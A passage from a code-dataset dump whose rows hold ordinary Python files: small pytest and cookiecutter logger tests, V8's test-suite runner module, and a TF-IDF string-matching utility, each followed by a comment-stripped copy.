hexsha stringlengths 40 40 | size int64 4 996k | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 996k | avg_line_length float64 1.33 58.2k | max_line_length int64 2 323k | alphanum_fraction float64 0 0.97 | content_no_comment stringlengths 0 946k | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f7fa18dacc1c9c0c60b03490e07fdafd357b7aad | 479 | py | Python | tests/test_my_module.py | sunxb05/pyworld | dfde82aefb74b614240e6bc138e2336fb6f102c8 | [
"Apache-2.0"
] | 1 | 2021-06-09T04:54:48.000Z | 2021-06-09T04:54:48.000Z | tests/test_my_module.py | sunxb05/pyworld | dfde82aefb74b614240e6bc138e2336fb6f102c8 | [
"Apache-2.0"
] | 5 | 2021-06-09T05:14:44.000Z | 2021-06-09T05:14:47.000Z | tests/test_my_module.py | sunxb05/pyworld | dfde82aefb74b614240e6bc138e2336fb6f102c8 | [
"Apache-2.0"
] | null | null | null | """Tests for the pyworld.my_module module.
"""
import pytest
from pyworld.my_module import hello
def test_hello():
assert hello('nlesc') == 'Hello nlesc!'
def test_hello_with_error():
with pytest.raises(ValueError) as excinfo:
hello('nobody')
assert 'Can not say hello to nobody' in str(excinfo.value)
@pytest.fixture
def some_name():
return 'Jane Smith'
def test_hello_with_fixture(some_name):
assert hello(some_name) == 'Hello Jane Smith!'
| 19.16 | 62 | 0.707724 | import pytest
from pyworld.my_module import hello
def test_hello():
assert hello('nlesc') == 'Hello nlesc!'
def test_hello_with_error():
with pytest.raises(ValueError) as excinfo:
hello('nobody')
assert 'Can not say hello to nobody' in str(excinfo.value)
@pytest.fixture
def some_name():
return 'Jane Smith'
def test_hello_with_fixture(some_name):
assert hello(some_name) == 'Hello Jane Smith!'
| true | true |
f7fa1955c4f00dd581986a39a8e91f56990e3f61 | 2,704 | py | Python | {{cookiecutter.project_directory_name}}/tests/test_logger_config.py | johnpneumann/cookiecutter-py | dc0110fcdeebd397c0ebde186cb5d2ffdef648d4 | [
"MIT"
] | 2 | 2017-01-19T05:59:46.000Z | 2019-01-19T06:44:23.000Z | {{cookiecutter.project_directory_name}}/tests/test_logger_config.py | johnpneumann/cookiecutter-py | dc0110fcdeebd397c0ebde186cb5d2ffdef648d4 | [
"MIT"
] | 4 | 2016-10-29T04:33:48.000Z | 2020-05-08T21:45:56.000Z | {{cookiecutter.project_directory_name}}/tests/test_logger_config.py | johnpneumann/cookiecutter-py | dc0110fcdeebd397c0ebde186cb5d2ffdef648d4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
tests.test_logger_config
~~~~~~~~~~~~~~~~~~~~~~~~
Tests the logger config.
:copyright: (c) {{ cookiecutter.copyright_year }} by {% if cookiecutter.project_owner == "" %}{{ cookiecutter.author_name }}{% else %}{{ cookiecutter.project_owner }}{% endif %}.
{%- if cookiecutter.open_source_license == 'Not open source' %}
"""
{%- else %}
{{ cookiecutter._license_strings[cookiecutter.open_source_license] }}
"""{% endif %}
{% if cookiecutter.use_file_logger == 'yes' %}
import os
import errno
{% endif -%}
import pytest
from mock import patch
from {{ cookiecutter.project_slug }} import logger_config
{% if cookiecutter.use_file_logger == 'yes' -%}
@patch('os.makedirs')
def test_logger_config_not_none(mock_makedirs, monkeypatch):
"""Ensure that the base call gets a valid logger config."""
monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
mock_makedirs.return_value = True
cfg = logger_config.get_logging_config()
expected_logdir = '/tmp/pylogs/{{ cookiecutter.project_slug }}'
mock_makedirs.assert_called_with(expected_logdir)
assert isinstance(cfg, dict)
@patch('os.makedirs')
def test_logger_dir_from_environ(mock_makedirs, monkeypatch):
"""Ensure that the logger dir attempts to create the directory from the environment variable."""
monkeypatch.setenv('{{ cookiecutter.file_logger_env_var_name }}', '/foo/bar/baz')
mock_makedirs.return_value = True
logger_config.get_logging_config()
expected_logdir = '/foo/bar/baz'
mock_makedirs.assert_called_with(expected_logdir)
@patch('os.path.isdir')
@patch('os.makedirs')
def test_logger_oserror_no_exist(mock_makedirs, mock_isdir, monkeypatch):
"""Ensure that we still get a dictionary back if we can't make the directory and it doesn't exist."""
monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
mock_isdir.return_value = False
mock_makedirs.side_effect = OSError
cfg = logger_config.get_logging_config()
assert isinstance(cfg, dict)
@patch('os.path.isdir')
@patch('os.makedirs')
def test_logger_oserror_exist(mock_makedirs, mock_isdir, monkeypatch):
"""Ensure that we still get a dictionary back if we can't make the directory and it doesn't exist."""
monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
mock_isdir.return_value = True
mock_makedirs.side_effect = OSError(errno.EEXIST)
cfg = logger_config.get_logging_config()
assert isinstance(cfg, dict)
{% else -%}
def test_logger_config_not_none():
"""Ensure that the base call gets a valid logger config."""
cfg = logger_config.get_logging_config()
assert isinstance(cfg, dict)
{% endif -%}
| 37.041096 | 182 | 0.715607 |
"""
tests.test_logger_config
~~~~~~~~~~~~~~~~~~~~~~~~
Tests the logger config.
:copyright: (c) {{ cookiecutter.copyright_year }} by {% if cookiecutter.project_owner == "" %}{{ cookiecutter.author_name }}{% else %}{{ cookiecutter.project_owner }}{% endif %}.
{%- if cookiecutter.open_source_license == 'Not open source' %}
"""
{%- else %}
{{ cookiecutter._license_strings[cookiecutter.open_source_license] }}
"""{% endif %}
{% if cookiecutter.use_file_logger == 'yes' %}
import os
import errno
{% endif -%}
import pytest
from mock import patch
from {{ cookiecutter.project_slug }} import logger_config
{% if cookiecutter.use_file_logger == 'yes' -%}
@patch('os.makedirs')
def test_logger_config_not_none(mock_makedirs, monkeypatch):
"""Ensure that the base call gets a valid logger config."""
monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
mock_makedirs.return_value = True
cfg = logger_config.get_logging_config()
expected_logdir = '/tmp/pylogs/{{ cookiecutter.project_slug }}'
mock_makedirs.assert_called_with(expected_logdir)
assert isinstance(cfg, dict)
@patch('os.makedirs')
def test_logger_dir_from_environ(mock_makedirs, monkeypatch):
"""Ensure that the logger dir attempts to create the directory from the environment variable."""
monkeypatch.setenv('{{ cookiecutter.file_logger_env_var_name }}', '/foo/bar/baz')
mock_makedirs.return_value = True
logger_config.get_logging_config()
expected_logdir = '/foo/bar/baz'
mock_makedirs.assert_called_with(expected_logdir)
@patch('os.path.isdir')
@patch('os.makedirs')
def test_logger_oserror_no_exist(mock_makedirs, mock_isdir, monkeypatch):
"""Ensure that we still get a dictionary back if we can't make the directory and it doesn't exist."""
monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
mock_isdir.return_value = False
mock_makedirs.side_effect = OSError
cfg = logger_config.get_logging_config()
assert isinstance(cfg, dict)
@patch('os.path.isdir')
@patch('os.makedirs')
def test_logger_oserror_exist(mock_makedirs, mock_isdir, monkeypatch):
"""Ensure that we still get a dictionary back if we can't make the directory and it doesn't exist."""
monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
mock_isdir.return_value = True
mock_makedirs.side_effect = OSError(errno.EEXIST)
cfg = logger_config.get_logging_config()
assert isinstance(cfg, dict)
{% else -%}
def test_logger_config_not_none():
"""Ensure that the base call gets a valid logger config."""
cfg = logger_config.get_logging_config()
assert isinstance(cfg, dict)
{% endif -%}
| false | true |
f7fa19b20a0b5ce18abe0cd934fbbe12145291b8 | 12,313 | py | Python | tools/testrunner/local/testsuite.py | ADVAN-ELAA-8QM-PRC1/platform-external-v8 | d424a9e93b8e25ab0e3ac5aead27a5fac0795a1b | [
"BSD-3-Clause"
] | 27 | 2017-12-14T13:48:25.000Z | 2020-12-31T15:46:55.000Z | tools/testrunner/local/testsuite.py | ADVAN-ELAA-8QM-PRC1/platform-external-v8 | d424a9e93b8e25ab0e3ac5aead27a5fac0795a1b | [
"BSD-3-Clause"
] | 10 | 2016-09-30T14:57:49.000Z | 2017-06-30T12:56:01.000Z | tools/testrunner/local/testsuite.py | ADVAN-ELAA-8QM-PRC1/platform-external-v8 | d424a9e93b8e25ab0e3ac5aead27a5fac0795a1b | [
"BSD-3-Clause"
] | 23 | 2016-08-03T17:43:32.000Z | 2021-03-04T17:09:00.000Z | # Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import os
from . import commands
from . import statusfile
from . import utils
from ..objects import testcase
from variants import ALL_VARIANTS, ALL_VARIANT_FLAGS, FAST_VARIANT_FLAGS
FAST_VARIANTS = set(["default", "turbofan"])
STANDARD_VARIANT = set(["default"])
class VariantGenerator(object):
def __init__(self, suite, variants):
self.suite = suite
self.all_variants = ALL_VARIANTS & variants
self.fast_variants = FAST_VARIANTS & variants
self.standard_variant = STANDARD_VARIANT & variants
def FilterVariantsByTest(self, testcase):
result = self.all_variants
if testcase.outcomes:
if statusfile.OnlyStandardVariant(testcase.outcomes):
return self.standard_variant
if statusfile.OnlyFastVariants(testcase.outcomes):
result = self.fast_variants
return result
def GetFlagSets(self, testcase, variant):
if testcase.outcomes and statusfile.OnlyFastVariants(testcase.outcomes):
return FAST_VARIANT_FLAGS[variant]
else:
return ALL_VARIANT_FLAGS[variant]
class TestSuite(object):
@staticmethod
def LoadTestSuite(root, global_init=True):
name = root.split(os.path.sep)[-1]
f = None
try:
(f, pathname, description) = imp.find_module("testcfg", [root])
module = imp.load_module("testcfg", f, pathname, description)
return module.GetSuite(name, root)
except ImportError:
# Use default if no testcfg is present.
return GoogleTestSuite(name, root)
finally:
if f:
f.close()
def __init__(self, name, root):
# Note: This might be called concurrently from different processes.
self.name = name # string
self.root = root # string containing path
self.tests = None # list of TestCase objects
self.rules = None # dictionary mapping test path to list of outcomes
self.wildcards = None # dictionary mapping test paths to list of outcomes
self.total_duration = None # float, assigned on demand
def shell(self):
return "d8"
def suffix(self):
return ".js"
def status_file(self):
return "%s/%s.status" % (self.root, self.name)
# Used in the status file and for stdout printing.
def CommonTestName(self, testcase):
if utils.IsWindows():
return testcase.path.replace("\\", "/")
else:
return testcase.path
def ListTests(self, context):
raise NotImplementedError
def _VariantGeneratorFactory(self):
"""The variant generator class to be used."""
return VariantGenerator
def CreateVariantGenerator(self, variants):
"""Return a generator for the testing variants of this suite.
Args:
variants: List of variant names to be run as specified by the test
runner.
Returns: An object of type VariantGenerator.
"""
return self._VariantGeneratorFactory()(self, set(variants))
def PrepareSources(self):
"""Called once before multiprocessing for doing file-system operations.
This should not access the network. For network access use the method
below.
"""
pass
def DownloadData(self):
pass
def ReadStatusFile(self, variables):
with open(self.status_file()) as f:
self.rules, self.wildcards = (
statusfile.ReadStatusFile(f.read(), variables))
def ReadTestCases(self, context):
self.tests = self.ListTests(context)
@staticmethod
def _FilterSlow(slow, mode):
return (mode == "run" and not slow) or (mode == "skip" and slow)
@staticmethod
def _FilterPassFail(pass_fail, mode):
return (mode == "run" and not pass_fail) or (mode == "skip" and pass_fail)
def FilterTestCasesByStatus(self, warn_unused_rules,
slow_tests="dontcare",
pass_fail_tests="dontcare",
variants=False):
# Use only variants-dependent rules and wildcards when filtering
# respective test cases and generic rules when filtering generic test
# cases.
if not variants:
rules = self.rules[""]
wildcards = self.wildcards[""]
else:
# We set rules and wildcards to a variant-specific version for each test
# below.
rules = {}
wildcards = {}
filtered = []
# Remember used rules as tuples of (rule, variant), where variant is "" for
# variant-independent rules.
used_rules = set()
for t in self.tests:
slow = False
pass_fail = False
testname = self.CommonTestName(t)
variant = t.variant or ""
if variants:
rules = self.rules[variant]
wildcards = self.wildcards[variant]
if testname in rules:
used_rules.add((testname, variant))
# Even for skipped tests, as the TestCase object stays around and
# PrintReport() uses it.
t.outcomes = t.outcomes | rules[testname]
if statusfile.DoSkip(t.outcomes):
continue # Don't add skipped tests to |filtered|.
for outcome in t.outcomes:
if outcome.startswith('Flags: '):
t.flags += outcome[7:].split()
slow = statusfile.IsSlow(t.outcomes)
pass_fail = statusfile.IsPassOrFail(t.outcomes)
skip = False
for rule in wildcards:
assert rule[-1] == '*'
if testname.startswith(rule[:-1]):
used_rules.add((rule, variant))
t.outcomes = t.outcomes | wildcards[rule]
if statusfile.DoSkip(t.outcomes):
skip = True
break # "for rule in wildcards"
slow = slow or statusfile.IsSlow(t.outcomes)
pass_fail = pass_fail or statusfile.IsPassOrFail(t.outcomes)
if (skip
or self._FilterSlow(slow, slow_tests)
or self._FilterPassFail(pass_fail, pass_fail_tests)):
continue # "for t in self.tests"
filtered.append(t)
self.tests = filtered
if not warn_unused_rules:
return
if not variants:
for rule in self.rules[""]:
if (rule, "") not in used_rules:
print("Unused rule: %s -> %s (variant independent)" % (
rule, self.rules[""][rule]))
for rule in self.wildcards[""]:
if (rule, "") not in used_rules:
print("Unused rule: %s -> %s (variant independent)" % (
rule, self.wildcards[""][rule]))
else:
for variant in ALL_VARIANTS:
for rule in self.rules[variant]:
if (rule, variant) not in used_rules:
print("Unused rule: %s -> %s (variant: %s)" % (
rule, self.rules[variant][rule], variant))
for rule in self.wildcards[variant]:
if (rule, variant) not in used_rules:
print("Unused rule: %s -> %s (variant: %s)" % (
rule, self.wildcards[variant][rule], variant))
def FilterTestCasesByArgs(self, args):
"""Filter test cases based on command-line arguments.
An argument with an asterisk in the end will match all test cases
that have the argument as a prefix. Without asterisk, only exact matches
will be used with the exeption of the test-suite name as argument.
"""
filtered = []
globs = []
exact_matches = []
for a in args:
argpath = a.split('/')
if argpath[0] != self.name:
continue
if len(argpath) == 1 or (len(argpath) == 2 and argpath[1] == '*'):
return # Don't filter, run all tests in this suite.
path = '/'.join(argpath[1:])
if path[-1] == '*':
path = path[:-1]
globs.append(path)
else:
exact_matches.append(path)
for t in self.tests:
for a in globs:
if t.path.startswith(a):
filtered.append(t)
break
for a in exact_matches:
if t.path == a:
filtered.append(t)
break
self.tests = filtered
def GetFlagsForTestCase(self, testcase, context):
raise NotImplementedError
def GetSourceForTest(self, testcase):
return "(no source available)"
def IsFailureOutput(self, testcase):
return testcase.output.exit_code != 0
def IsNegativeTest(self, testcase):
return False
def HasFailed(self, testcase):
execution_failed = self.IsFailureOutput(testcase)
if self.IsNegativeTest(testcase):
return not execution_failed
else:
return execution_failed
def GetOutcome(self, testcase):
if testcase.output.HasCrashed():
return statusfile.CRASH
elif testcase.output.HasTimedOut():
return statusfile.TIMEOUT
elif self.HasFailed(testcase):
return statusfile.FAIL
else:
return statusfile.PASS
def HasUnexpectedOutput(self, testcase):
outcome = self.GetOutcome(testcase)
return not outcome in (testcase.outcomes or [statusfile.PASS])
def StripOutputForTransmit(self, testcase):
if not self.HasUnexpectedOutput(testcase):
testcase.output.stdout = ""
testcase.output.stderr = ""
def CalculateTotalDuration(self):
self.total_duration = 0.0
for t in self.tests:
self.total_duration += t.duration
return self.total_duration
class StandardVariantGenerator(VariantGenerator):
def FilterVariantsByTest(self, testcase):
return self.standard_variant
class GoogleTestSuite(TestSuite):
def __init__(self, name, root):
super(GoogleTestSuite, self).__init__(name, root)
def ListTests(self, context):
shell = os.path.abspath(os.path.join(context.shell_dir, self.shell()))
if utils.IsWindows():
shell += ".exe"
output = None
for i in xrange(3): # Try 3 times in case of errors.
output = commands.Execute(context.command_prefix +
[shell, "--gtest_list_tests"] +
context.extra_flags)
if output.exit_code == 0:
break
print "Test executable failed to list the tests (try %d).\n\nStdout:" % i
print output.stdout
print "\nStderr:"
print output.stderr
print "\nExit code: %d" % output.exit_code
else:
raise Exception("Test executable failed to list the tests.")
tests = []
test_case = ''
for line in output.stdout.splitlines():
test_desc = line.strip().split()[0]
if test_desc.endswith('.'):
test_case = test_desc
elif test_case and test_desc:
test = testcase.TestCase(self, test_case + test_desc)
tests.append(test)
tests.sort(key=lambda t: t.path)
return tests
def GetFlagsForTestCase(self, testcase, context):
return (testcase.flags + ["--gtest_filter=" + testcase.path] +
["--gtest_random_seed=%s" % context.random_seed] +
["--gtest_print_time=0"] +
context.mode_flags)
def _VariantGeneratorFactory(self):
return StandardVariantGenerator
def shell(self):
return self.name
| 33.550409 | 79 | 0.659222 |
import imp
import os
from . import commands
from . import statusfile
from . import utils
from ..objects import testcase
from variants import ALL_VARIANTS, ALL_VARIANT_FLAGS, FAST_VARIANT_FLAGS
FAST_VARIANTS = set(["default", "turbofan"])
STANDARD_VARIANT = set(["default"])
class VariantGenerator(object):
def __init__(self, suite, variants):
self.suite = suite
self.all_variants = ALL_VARIANTS & variants
self.fast_variants = FAST_VARIANTS & variants
self.standard_variant = STANDARD_VARIANT & variants
def FilterVariantsByTest(self, testcase):
result = self.all_variants
if testcase.outcomes:
if statusfile.OnlyStandardVariant(testcase.outcomes):
return self.standard_variant
if statusfile.OnlyFastVariants(testcase.outcomes):
result = self.fast_variants
return result
def GetFlagSets(self, testcase, variant):
if testcase.outcomes and statusfile.OnlyFastVariants(testcase.outcomes):
return FAST_VARIANT_FLAGS[variant]
else:
return ALL_VARIANT_FLAGS[variant]
class TestSuite(object):
@staticmethod
def LoadTestSuite(root, global_init=True):
name = root.split(os.path.sep)[-1]
f = None
try:
(f, pathname, description) = imp.find_module("testcfg", [root])
module = imp.load_module("testcfg", f, pathname, description)
return module.GetSuite(name, root)
except ImportError:
return GoogleTestSuite(name, root)
finally:
if f:
f.close()
def __init__(self, name, root):
self.name = name
self.root = root
self.tests = None
self.rules = None
self.wildcards = None
self.total_duration = None
def shell(self):
return "d8"
def suffix(self):
return ".js"
def status_file(self):
return "%s/%s.status" % (self.root, self.name)
def CommonTestName(self, testcase):
if utils.IsWindows():
return testcase.path.replace("\\", "/")
else:
return testcase.path
def ListTests(self, context):
raise NotImplementedError
def _VariantGeneratorFactory(self):
"""The variant generator class to be used."""
return VariantGenerator
def CreateVariantGenerator(self, variants):
"""Return a generator for the testing variants of this suite.
Args:
variants: List of variant names to be run as specified by the test
runner.
Returns: An object of type VariantGenerator.
"""
return self._VariantGeneratorFactory()(self, set(variants))
def PrepareSources(self):
"""Called once before multiprocessing for doing file-system operations.
This should not access the network. For network access use the method
below.
"""
pass
def DownloadData(self):
pass
def ReadStatusFile(self, variables):
with open(self.status_file()) as f:
self.rules, self.wildcards = (
statusfile.ReadStatusFile(f.read(), variables))
def ReadTestCases(self, context):
self.tests = self.ListTests(context)
@staticmethod
def _FilterSlow(slow, mode):
return (mode == "run" and not slow) or (mode == "skip" and slow)
@staticmethod
def _FilterPassFail(pass_fail, mode):
return (mode == "run" and not pass_fail) or (mode == "skip" and pass_fail)
def FilterTestCasesByStatus(self, warn_unused_rules,
slow_tests="dontcare",
pass_fail_tests="dontcare",
variants=False):
if not variants:
rules = self.rules[""]
wildcards = self.wildcards[""]
else:
rules = {}
wildcards = {}
filtered = []
used_rules = set()
for t in self.tests:
slow = False
pass_fail = False
testname = self.CommonTestName(t)
variant = t.variant or ""
if variants:
rules = self.rules[variant]
wildcards = self.wildcards[variant]
if testname in rules:
used_rules.add((testname, variant))
t.outcomes = t.outcomes | rules[testname]
if statusfile.DoSkip(t.outcomes):
continue
for outcome in t.outcomes:
if outcome.startswith('Flags: '):
t.flags += outcome[7:].split()
slow = statusfile.IsSlow(t.outcomes)
pass_fail = statusfile.IsPassOrFail(t.outcomes)
skip = False
for rule in wildcards:
assert rule[-1] == '*'
if testname.startswith(rule[:-1]):
used_rules.add((rule, variant))
t.outcomes = t.outcomes | wildcards[rule]
if statusfile.DoSkip(t.outcomes):
skip = True
break # "for rule in wildcards"
slow = slow or statusfile.IsSlow(t.outcomes)
pass_fail = pass_fail or statusfile.IsPassOrFail(t.outcomes)
if (skip
or self._FilterSlow(slow, slow_tests)
or self._FilterPassFail(pass_fail, pass_fail_tests)):
continue # "for t in self.tests"
filtered.append(t)
self.tests = filtered
if not warn_unused_rules:
return
if not variants:
for rule in self.rules[""]:
if (rule, "") not in used_rules:
print("Unused rule: %s -> %s (variant independent)" % (
rule, self.rules[""][rule]))
for rule in self.wildcards[""]:
if (rule, "") not in used_rules:
print("Unused rule: %s -> %s (variant independent)" % (
rule, self.wildcards[""][rule]))
else:
for variant in ALL_VARIANTS:
for rule in self.rules[variant]:
if (rule, variant) not in used_rules:
print("Unused rule: %s -> %s (variant: %s)" % (
rule, self.rules[variant][rule], variant))
for rule in self.wildcards[variant]:
if (rule, variant) not in used_rules:
print("Unused rule: %s -> %s (variant: %s)" % (
rule, self.wildcards[variant][rule], variant))
def FilterTestCasesByArgs(self, args):
"""Filter test cases based on command-line arguments.
An argument with an asterisk in the end will match all test cases
that have the argument as a prefix. Without asterisk, only exact matches
will be used with the exeption of the test-suite name as argument.
"""
filtered = []
globs = []
exact_matches = []
for a in args:
argpath = a.split('/')
if argpath[0] != self.name:
continue
if len(argpath) == 1 or (len(argpath) == 2 and argpath[1] == '*'):
return # Don't filter, run all tests in this suite.
path = '/'.join(argpath[1:])
if path[-1] == '*':
path = path[:-1]
globs.append(path)
else:
exact_matches.append(path)
for t in self.tests:
for a in globs:
if t.path.startswith(a):
filtered.append(t)
break
for a in exact_matches:
if t.path == a:
filtered.append(t)
break
self.tests = filtered
def GetFlagsForTestCase(self, testcase, context):
raise NotImplementedError
def GetSourceForTest(self, testcase):
return "(no source available)"
def IsFailureOutput(self, testcase):
return testcase.output.exit_code != 0
def IsNegativeTest(self, testcase):
return False
def HasFailed(self, testcase):
execution_failed = self.IsFailureOutput(testcase)
if self.IsNegativeTest(testcase):
return not execution_failed
else:
return execution_failed
def GetOutcome(self, testcase):
if testcase.output.HasCrashed():
return statusfile.CRASH
elif testcase.output.HasTimedOut():
return statusfile.TIMEOUT
elif self.HasFailed(testcase):
return statusfile.FAIL
else:
return statusfile.PASS
def HasUnexpectedOutput(self, testcase):
outcome = self.GetOutcome(testcase)
return not outcome in (testcase.outcomes or [statusfile.PASS])
def StripOutputForTransmit(self, testcase):
if not self.HasUnexpectedOutput(testcase):
testcase.output.stdout = ""
testcase.output.stderr = ""
def CalculateTotalDuration(self):
self.total_duration = 0.0
for t in self.tests:
self.total_duration += t.duration
return self.total_duration
class StandardVariantGenerator(VariantGenerator):
def FilterVariantsByTest(self, testcase):
return self.standard_variant
class GoogleTestSuite(TestSuite):
def __init__(self, name, root):
super(GoogleTestSuite, self).__init__(name, root)
def ListTests(self, context):
shell = os.path.abspath(os.path.join(context.shell_dir, self.shell()))
if utils.IsWindows():
shell += ".exe"
output = None
for i in xrange(3):
output = commands.Execute(context.command_prefix +
[shell, "--gtest_list_tests"] +
context.extra_flags)
if output.exit_code == 0:
break
print "Test executable failed to list the tests (try %d).\n\nStdout:" % i
print output.stdout
print "\nStderr:"
print output.stderr
print "\nExit code: %d" % output.exit_code
else:
raise Exception("Test executable failed to list the tests.")
tests = []
test_case = ''
for line in output.stdout.splitlines():
test_desc = line.strip().split()[0]
if test_desc.endswith('.'):
test_case = test_desc
elif test_case and test_desc:
test = testcase.TestCase(self, test_case + test_desc)
tests.append(test)
tests.sort(key=lambda t: t.path)
return tests
def GetFlagsForTestCase(self, testcase, context):
return (testcase.flags + ["--gtest_filter=" + testcase.path] +
["--gtest_random_seed=%s" % context.random_seed] +
["--gtest_print_time=0"] +
context.mode_flags)
def _VariantGeneratorFactory(self):
return StandardVariantGenerator
def shell(self):
return self.name
| false | true |
f7fa1a074af2265b09ac4db94b81f190e7723a36 | 4,353 | py | Python | tfidf_matcher/matcher.py | LouisTsiattalou/tfidf_matcher | e95139f16329d149a2a3c1002d5b9bfe6da3b116 | [
"MIT"
] | 13 | 2020-02-24T18:29:15.000Z | 2021-12-28T09:41:35.000Z | tfidf_matcher/matcher.py | LouisTsiattalou/tfidf_matcher | e95139f16329d149a2a3c1002d5b9bfe6da3b116 | [
"MIT"
] | null | null | null | tfidf_matcher/matcher.py | LouisTsiattalou/tfidf_matcher | e95139f16329d149a2a3c1002d5b9bfe6da3b116 | [
"MIT"
] | 3 | 2020-07-21T04:32:45.000Z | 2021-10-21T11:00:56.000Z | # AUTHOR: Louis Tsiattalou
# DESCRIPTION: Match list items to closest tf-idf match in second list.
import pandas as pd
from tfidf_matcher.ngrams import ngrams
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.neighbors import NearestNeighbors
def matcher(original = [], lookup = [], k_matches = 5, ngram_length = 3):
"""Takes two lists, returns top `k` matches from `lookup` dataset.
This function does this by:
- Splitting the `lookup` list into ngrams.
- Transforming the resulting ngram list into a TF-IDF Sparse Matrix.
- Fit a NearestNeighbours Model to the matrix using the lookup data.
- Transform the `original` list into a TF-IDF Sparse Matrix.
- Calculates distances to all the `n-matches` nearest neighbours
- Then extract the `original`, `n-matches` closest lookups, and calculate
a match score (abs(1 - Distance to Nearest Neighbour))
:param original: List of strings to generate ngrams from.
:type original: list (of strings), or Pandas Series.
:param lookup: List of strings to match against.
:type lookup: list (of strings), or Pandas Series.
:param k_matches: Number of matches to return.
:type k_matches: int
:param ngram_length: Length of Ngrams returned by `tfidf_matcher.ngrams` callable
:type ngram_length: int
:raises AssertionError: Throws an error if the datatypes in `original` aren't strings.
:raises AssertionError: Throws an error if the datatypes in `lookup` aren't strings.
:raises AssertionError: Throws an error if `k_matches` isn't an integer.
:raises AssertionError: Throws an error if k_matches > len(lookup)
:raises AssertionError: Throws an error if ngram_length isn't an integer
:return: Returns a Pandas dataframe with the `original` list,
`k_matches` columns containing the closest matches from `lookup`,
as well as a Match Score for the closest of these matches.
:rtype: Pandas dataframe
"""
# Assertions
assert all([type(x) == type("string") for x in original]), "Original contains non-str elements!"
assert all([type(x) == type("string") for x in lookup]), "Lookup contains non-str elements!"
assert type(k_matches) == type(0), "k_matches must be an integer"
assert k_matches <= len(lookup), "k_matches must be shorter or equal to the total length of the lookup list"
assert type(ngram_length) == type(0), "ngram_length must be an integer"
# Enforce listtype, set to lower
original = list(original)
lookup = list(lookup)
original_lower = [x.lower() for x in original]
lookup_lower = [x.lower() for x in lookup]
# Set ngram length for TfidfVectorizer callable
def ngrams_user(string, n = ngram_length):
return ngrams(string, n)
# Generate Sparse TFIDF matrix from Lookup corpus
vectorizer = TfidfVectorizer(min_df = 1,
analyzer = ngrams_user)
tf_idf_lookup = vectorizer.fit_transform(lookup_lower)
# Fit KNN model to sparse TFIDF matrix generated from Lookup
nbrs = NearestNeighbors(n_neighbors=k_matches,
n_jobs=-1, metric='cosine').fit(tf_idf_lookup)
# Use nbrs model to obtain nearest matches in lookup dataset. Vectorize first.
tf_idf_original = vectorizer.transform(original_lower)
distances, indices = nbrs.kneighbors(tf_idf_original)
# Extract top Match Score (which is just the distance to the nearest neighbour),
# Original match item, and Lookup matches.
meta_list= []
lookup_list= []
for i,idx in enumerate(indices): # i is 0:len(original), j is list of lists of matches
metadata = [round(distances[i][0], 2), original[i]] # Original match and Match Score
lookups = [lookup[x] for x in idx] # Lookup columns
meta_list.append(metadata)
lookup_list.append(lookups)
# Convert to df
df_metadata = pd.DataFrame(meta_list, columns = ['Match Confidence', 'Original Name'])
df_lookups = pd.DataFrame(lookup_list,
columns=['Lookup ' + str(x+1) for x in range(0,k_matches)])
# bind columns, transform Match Confidence to {0,1} with 1 a guaranteed match.
matches = pd.concat([df_metadata, df_lookups], axis = 1)
matches['Match Confidence'] = abs(matches['Match Confidence'] - 1)
return matches
| 48.366667 | 112 | 0.699977 |
import pandas as pd
from tfidf_matcher.ngrams import ngrams
